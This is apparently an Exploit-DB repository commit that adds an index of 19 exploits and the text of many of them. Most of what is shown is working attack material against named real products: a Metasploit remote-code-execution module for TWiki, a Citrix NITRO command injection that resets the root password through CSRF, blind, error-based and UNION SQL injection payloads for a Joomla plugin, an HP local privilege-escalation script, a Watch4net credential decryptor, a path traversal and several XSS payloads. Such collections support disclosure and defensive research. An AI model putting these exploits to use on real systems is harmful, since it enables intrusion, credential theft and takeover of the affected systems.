DB: 2015-03-20

19 new exploits

files.csv

@@ -31582,7 +31582,7 @@ id,file,description,date,author,platform,type,port
 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
 35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0
-35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
+35063,platforms/php/webapps/35063.txt,"Zimplit CMS - zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
 35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
 35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
@@ -32844,3 +32844,22 @@ id,file,description,date,author,platform,type,port
 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25
 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000
 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447
+36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0
+36425,platforms/linux/dos/36425.txt,"Linux Kernel Network Namespace Remote Denial of Service Vulnerability",2011-12-06,"Serge Hallyn",linux,dos,0
+36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 Session Tampering Security Bypass Vulnerability",2011-12-07,"Hisato Killing",multiple,remote,0
+36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 Remote Denial of Service Vulnerability",2011-12-07,"Luigi Auriemma",windows,dos,0
+36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross Site Scripting Vulnerability",2011-12-07,"Matt Metzger",hardware,remote,0
+36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0
+36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 'GetInstalledPackages' Local Privilege Escalation Vulnerability",2011-12-08,anonymous,linux,local,0
+36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 .tga Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0
+36432,platforms/php/webapps/36432.txt,"Pet Listing 'preview.php' Cross Site Scripting Vulnerability",2011-12-09,Mr.PaPaRoSSe,php,webapps,0
+36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player ActiveX Control 'open()' Method Stack Buffer Overflow Vulnerability",2011-04-20,shinnai,windows,dos,0
+36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-12,Am!r,php,webapps,0
+36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80
+36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0
+36437,platforms/windows/local/36437.rb,"Publish-It PUI Buffer Overflow (SEH)",2015-03-19,metasploit,windows,local,0
+36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins Remote Code Execution",2015-03-19,metasploit,php,remote,80
+36439,platforms/php/webapps/36439.txt,"Joomla ECommerce-WD Plugin 1.2.5 - SQL Injection Vulnerabilities",2015-03-19,"Brandon Perry",php,webapps,80
+36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
+36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
+36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection Vulnerability",2015-03-19,"Han Sahin",linux,webapps,0

platforms/hardware/remote/36428.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50968/info
+
+Axis M10 Series Network Cameras are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Axis M1054 firmware 5.21 is vulnerable; other version may also be affected. 
+
+http://www.example.com/admin/showReport.shtml?content=serverreport.cgi&pageTitle=%3C%2Ftitle%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3B%3C%2Fscript%3E%3Ctitle%3E

platforms/hardware/remote/36429.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/50978/info
+
+HS2 web interface is prone to multiple security vulnerabilities:
+
+1. An HTML-injection vulnerability.
+2. A cross-site request-forgery vulnerability.
+3. A directory-traversal vulnerability.
+
+Attackers can exploit these issues to perform certain actions in the context of an authorized user's session, run arbitrary HTML and script code, and transfer files outside of the web directory. Other attacks may also be possible.
+
+HomeSeer HS2 2.5.0.20 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/example<script>alert(document.cookie)</script>

platforms/java/webapps/36436.txt

@@ -0,0 +1,70 @@
+Abstract
+
+
+It was discovered that EMC M&R (Watch4net) credentials of remote servers stored in Watch4net are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.
+
+Affected products
+
+
+EMC reports that the following products are affected by this vulnerability:
+
+- EMC M&R (Watch4Net) versions prior 6.5u1
+- EMC ViPR SRM versions prior to 3.6.1
+
+See also
+
+
+- CVE-2015-0514
+- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
+- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)
+
+Fix
+
+
+EMC released the following updated versions that resolve this vulnerability:
+
+- EMC M&R (Watch4Net) 6.5u1
+- EMC ViPR SRM 3.6.1
+
+Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.
+
+Introduction
+
+
+EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.
+
+The Remote-Shell-Collector module from EMC M&R (Watch4net) can push and run executable files on remote hosts to collect performance data from storage environments. Remote-Shell-Collector uses SSH for this purpose.
+
+In order to push and collect monitoring data, accounts are created on the remote servers and credentials of these remote servers are stored in Watch4net. These credentials are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.
+
+Details
+
+
+Due to insecure use of cryptography the credentials of these remote host can be decrypted using the Java class com.watch4net.apg.v2.common.config.tools.Utils.process().
+
+Proof of concept
+
+
+import com.watch4net.apg.v2.common.config.tools.Utils;
+
+public class Watch4NetCrypt {
+   private static void print(String out) {
+      System.out.println(out);
+   }
+
+   private static void usage() {
+      print("Usage:\t watch4netcrypt [-e] password");
+      print("\t watch4netcrypt [-d] encrypted");
+      System.exit(1);
+   }
+
+   public static void main(String[] args) {
+      if (args.length != 2 || !("-e".equals(args[0]) || "-d".equals(args[0]))) {
+         usage();
+      }
+      Boolean encrypt = "-e".equals(args[0]);
+      String password = args[1];
+      if (password != null) {
+         print(Utils.process(password, encrypt, "centralized", null));
+      }
+}

platforms/java/webapps/36440.txt

@@ -0,0 +1,45 @@
+Abstract
+
+
+A path traversal vulnerability was found in EMC M&R (Watch4net) Device Discovery. This vulnerability allows an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.
+
+Affected products
+
+
+EMC reports that the following products are affected by this vulnerability:
+
+- EMC M&R (Watch4Net) versions prior 6.5u1
+- EMC ViPR SRM versions prior to 3.6.1
+
+See also
+
+
+- CVE-2015-0516
+- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
+- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)
+
+Fix
+
+
+EMC released the following updated versions that resolve this vulnerability:
+
+- EMC M&R (Watch4Net) 6.5u1
+- EMC ViPR SRM 3.6.1
+
+Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.
+
+Introduction
+
+
+EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.
+
+A path traversal vulnerability was found in M&R (Watch4net) Device Discovery. Path traversal vulnerabilities arise when user-controllable data is used insecurely within a file system operation. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file.
+
+Details
+
+
+This vulnerability can be trigger via de fileFileName URL parameter of the /device-discovery/devicesource/downloadSeedFile page. An authenticated attacker can supply path traversal sequences to break out of the intended download directory and read files elsewhere on the file system. This allows the attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.
+
+The following URL can be used to demonstrate this issue:
+
+http://<target>:58080/device-discovery/devicesource/downloadSeedFile?fileFileName=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts

platforms/linux/dos/36425.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50938/info
+
+The Linux kernel is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause an out-of-memory error in certain linux applications, resulting in denial-of-service conditions.
+
+Linux kernel versions 2.6.35 and earlier are affected. 
+
+$ for i in 1 2 3 4 5 6 7 8 ; do ./feedftp $i >/dev/null & done 

platforms/linux/local/36430.sh

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/50982/info
+
+HP Application Lifestyle Management is prone to a local privilege-escalation vulnerability.
+
+Local attackers can exploit this issue to execute arbitrary code with elevated privileges. 
+
+#!/bin/bash
+# Simple PoC : Run as user, when vulnerable function is called
+# /home/user/binary_to_run_as_root is run as root.
+cat > file << EOF
+Child Components
+0a29406d9794e4f9b30b3c5d6702c708
+\`/home/user/binary_to_run_as_root\`
+EOF
+mkfifo /tmp/tmp.txt                     # set trap
+cat /tmp/tmp.txt                        # blocks for victim
+while [ -e /tmp/tmp.txt ]; do
+       cat file > /tmp/tmp.txt
+       sleep 2
+done
+rm file

platforms/linux/webapps/36442.txt

@@ -0,0 +1,51 @@
+Abstract
+
+
+Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
+
+Tested version
+
+
+This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected.
+
+Fix
+
+
+Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc.
+
+Introduction
+
+
+The Citrix NetScaler SDX platform delivers fully isolated NetScaler instances running on a single appliance. Each instance is a full-blown NetScaler environment, which optimizes delivery of applications over the Internet and private networks. The NITRO SDK allows you to configure and monitor the NetScaler appliance programmatically. NITRO exposes its functionality through REST interfaces. A Cross-Site Scripting vulnerability was found in one of the REST services exposed by the NITRO SDK.
+
+Administrators can upload XenServer hotfixes to the Citrix SDX appliance. The REST interface responsible for handling these hotfixes is vulnerable to command injection.
+
+Details
+
+
+This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
+
+The following proof of concept can be used to exploit this issue;
+<html>
+   <body>
+      <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST">
+         <input type="hidden" name="object" value="&#123;"params"&#58;&#123;"action"&#58;"start"&#125;&#44;"xen&#95;hotfix"&#58;&#91;&#123;"file&#95;name"&#58;"&#46;&#46;&#47;&#46;&#46;&#47;etc&#47;passwd&#59;echo&#32;nsroot&#58;Securify&#124;chpasswd&#59;"&#125;&#93;&#125;" />
+         <input type="submit" value="Submit request" />
+      </form>
+      <script>document.forms[0].submit();</script>
+   </body>
+</html>
+
+
+
+POST /nitro/v1/config/xen_hotfix HTTP/1.1
+-----------------------------------------
+
+object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}
+
+or
+
+object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]}
+
+
+Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page.

platforms/multiple/remote/36426.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50940/info
+
+Apache Struts is prone to a security-bypass vulnerability that allows session tampering.
+
+Successful attacks will allow attackers to bypass security restrictions and gain unauthorized access.
+
+Apache Struts versions 2.0.9 and 2.1.8.1 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/SomeAction.action?session.somekey=someValue 

platforms/php/remote/36438.rb

@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'TWiki Debugenableplugins Remote Code Execution',
+      'Description' => %q{
+        TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.
+        The value of the debugenableplugins parameter is used without proper sanitization
+        in an Perl eval statement which allows remote code execution
+      },
+      'Author' =>
+        [
+          'Netanel Rubin', # from Check Point - Discovery
+          'h0ng10', # Metasploit Module
+
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', '2014-7236'],
+          [ 'OSVDB', '112977'],
+          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
+        ],
+      'Privileged' => false,
+      'Targets' =>
+        [
+          [ 'Automatic',
+            {
+              'Payload'        =>
+                {
+                  'BadChars' => "",
+                  'Compat'      =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic perl python php',
+                    }
+                },
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Oct 09 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
+        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
+      ], self.class)
+  end
+
+
+  def send_code(perl_code)
+    uri = target_uri.path
+    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"
+
+    res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => uri,
+      'data' => data
+    })
+
+    return res
+  end
+
+
+  def check
+    rand_1 = rand_text_alpha(5)
+    rand_2 = rand_text_alpha(5)
+
+    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
+    res = send_code(code)
+
+    if res and res.code == 200
+      return CheckCode::Vulnerable if res.body == rand_1 + rand_2
+    end
+    CheckCode::Unknown
+  end
+
+
+  def exploit
+    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
+    code += "require('MIME/Base64.pm');MIME::Base64->import();"
+    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
+    res = send_code(code)
+    handler
+
+  end
+
+end

platforms/php/webapps/36432.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50996/info
+
+Pet Listing is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">[XSS] 

platforms/php/webapps/36434.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51012/info
+
+GRAND FlAGallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+GRAND FlAGallery 1.57 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] 

platforms/php/webapps/36435.txt

@@ -0,0 +1,160 @@
+I. Overview 
+======================================================== 
+Chamilo LMS 1.9.10 or prior versions are prone to a multiple Cross-Site Scripting (Stored + Reflected) & CSRF vulnerabilities. These vulnerabilities allows an attacker to gain control over valid user accounts in LMS, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. 
+
+II. Severity 
+======================================================== 
+Rating: High 
+Remote: Yes 
+Authentication Require: Yes 
+CVE-ID: 
+
+III. Vendor's Description of Application 
+======================================================== 
+Chamilo LMS, or Chamilo Learning Management System is a piece of software that allows you to create a virtual campus for the provision of online or semi-online training. It is distributed under the GNU/GPLv3+ license and its development process is public. All the Chamilo software products are entirely free (as in freedom), free (as in beer) and complete, and are production-ready without requiring any type of payment. 
+
+https://chamilo.org/chamilo-lms/ 
+
+IV. Vulnerability Details & Exploit 
+======================================================== 
+1) Multiple Reflected XSS Request 
+
+Request Method = GET 
+
+XSS PoC's:- 
+
+/main/calendar/agenda_list.php?type=personal%27%20onmouseover=%27confirm%280%29%27/%3E%3C!--
+/main/messages/outbox.php?f=social"+onmouseover="confirm(0)
+/main/mySpace/student.php?keyword=31337"+onmouseover=confirm(0)//&active=0&_qf__search_user=&submit=Search
+/main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax_get_file_listing.php?editor=stand_alone&view=thumbnail&search=1&search_name=admin&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=;</script><script>confirm(0)</script>
+/main/admin/configure_extensions.php?display=</script><script>confirm(0)</script>
+/main/admin/course_category.php?action=add&category="/><script>confirm(0)</script>
+/main/admin/session_edit.php?page=resume_session.php%22%20onmouseover=confirm%280%29//&id=1
+
+b) User Agent Header XSS (Reflected)
+GET /main/admin/system_status.php?section=webserver
+User-Agent: <script>confirm(0)</script>
+__________________________________________________________ 
+
+2) Stored XSS 
+
+File Attachment Description parameter (legend[]) is vulnerable to Stored XSS By utilizing "social network" an attacker may send a crafted message to anybody with XSS payload in the file attachment description field (i.e legend[]) 
+
+Request Method : POST 
+Location = /main/messages/new_message.php?f=social 
+Parameter = legend[] 
+
+Stored XSS PoC :- 
+
+POST /main/messages/new_message.php?f=social HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
+Gecko/20100101 Firefox/36.0
+Accept: text/html,application/xhtml
++xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/main/messages/new_message.php?f=social
+Cookie: XXXXXXXXXXXXXXXXXXXXXX
+Connection: keep-alive
+Content-Type: multipart/form-data;
+boundary=---------------------------8461144986726
+Content-Length: 1023
+-----------------------------8461144986726
+Content-Disposition: form-data; name="users[]"
+3
+-----------------------------8461144986726
+Content-Disposition: form-data; name="title"
+Stored XSS Test Via Social network
+-----------------------------8461144986726
+Content-Disposition: form-data; name="content"
+This is test message<BR>
+-----------------------------8461144986726
+Content-Disposition: form-data; name="attach_1"; filename="test.txt"
+Content-Type: text/plain
+I owned you !!!!
+-----------------------------8461144986726
+Content-Disposition: form-data; name="legend[]"
+Cool File <script>confirm(0)</script>
+-----------------------------8461144986726
+Content-Disposition: form-data; name="compose"
+
+-----------------------------8461144986726
+Content-Disposition: form-data; name="_qf__compose_message"
+
+-----------------------------8461144986726
+Content-Disposition: form-data; name="sec_token"
+42917ca29da38f60d49bbaf2ba89b1b9
+-----------------------------8461144986726--
+________________________________________________________________________ 
+
+3) CSRF & Stored XSS Request 
+
+Method = POST 
+Location = /main/admin/session_add.php 
+Parameter = name 
+
+POST /main/admin/session_add.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
+Gecko/20100101 Firefox/36.0
+Accept: text/html,application/xhtml
++xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1//main/admin/session_add.php
+Cookie:XXXXXXXXXXXXXXXXXXXXXX
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 231
+
+formSent=1&name=<script>confirm(0)</script>&coach_username=rehan&session_category=0&nb_days_acess_before=0&nb_days_acess_after=0&start_limit=on&day_start=2&month_start=3&year_start=2015&end_limit=on&day_end=2&month_end=3&year_end=2016&session_visibility=2
+
+CSRF PoC:-
+
+<html>
+<!-- CSRF Request With Stored XSS Payload -->
+<body>
+<form action="http://127.0.0.1/main/admin/session_add.php"
+method="POST">
+<input type="hidden" name="formSent" value="1" />
+<input type="hidden" name="name"
+value="Test<script>confirm(0)</script>" />
+<input type="hidden" name="coach_username" value="admin" />
+<input type="hidden" name="session_category" value="0" />
+<input type="hidden" name="nb_days_acess_before"
+value="0" />
+<input type="hidden" name="nb_days_acess_after"
+value="0" />
+<input type="hidden" name="start_limit" value="on" />
+<input type="hidden" name="day_start" value="2" />
+<input type="hidden" name="month_start" value="3" />
+<input type="hidden" name="year_start" value="2015" />
+<input type="hidden" name="end_limit" value="on" />
+<input type="hidden" name="day_end" value="2" />
+<input type="hidden" name="month_end" value="3" />
+<input type="hidden" name="year_end" value="2016" />
+<input type="hidden" name="session_visibility" value="1" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+VI. Affected Systems 
+======================================================== 
+Software: Chamilo LMS 
+Version: 1.9.10 and Prior
+Solution (Fix): Upgrade to 1.9.11 (https://github.com/chamilo/chamilo-lms/)
+
+VII. Vendor Response/Solution 
+======================================================== 
+Vendor Contacted : 02/12/2015 
+Vendor Response : 02/12/2015 
+Patch Release: 03/17/2015 
+Advisory Release: 03/18/2015
+
+VIII.Credits 
+======================================================== 
+Discovered by Rehan Ahmed 
+knight_rehan@hotmail.com     

platforms/php/webapps/36439.txt

@@ -0,0 +1,123 @@
+Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple
+unauthenticated SQL injections available via the advanced search
+functionality.
+
+http://extensions.joomla.org/extension/ecommerce-wd
+
+The vulnerable parameters are search_category_id, sort_order, and
+filter_manufacturer_ids within the following request:
+
+POST
+/index.php?option=com_ecommercewd&controller=products&task=displayproducts
+HTTP/1.1
+Host: 172.31.16.49
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101
+Firefox/30.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120
+Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 321
+
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+
+Vectors:
+
+Parameter: filter_manufacturer_ids (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
+AND 8066=8066 AND
+(7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
+AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
+(ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
+(1212=1212&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+    Type: AND/OR time-based blind
+    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
+AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND
+(1480=1480&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+
+
+Parameter: search_category_id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
+AND 3039=3039 AND
+(6271=6271&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
+AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
+(ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
+(8257=8257&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+    Type: AND/OR time-based blind
+    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
+AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND
+(1251=1251&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 1 column
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
+UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
+&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12
+
+
+
+Parameter: sort_order (POST)
+    Type: boolean-based blind
+    Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
+(CASE WHEN (8973=8973) THEN 1 ELSE 8973*(SELECT 8973 FROM
+INFORMATION_SCHEMA.CHARACTER_SETS)
+END))&pagination_limit_start=0&pagination_limit=12
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause
+    Payload:
+product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
+(CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM
+INFORMATION_SCHEMA.CHARACTER_SETS)
+END))&pagination_limit_start=0&pagination_limit=12
+
+
+Metasploit modules that exploit the UNION-based injection are available on
+ExploitHub:
+
+Enumerate users --
+https://exploithub.com/joomla-e-commerce-wd-plugin-users-enumeration-via-sql-injection.html
+Read files --
+https://exploithub.com/joomla-e-commerce-wd-plugin-file-download-via-sql-injection.html
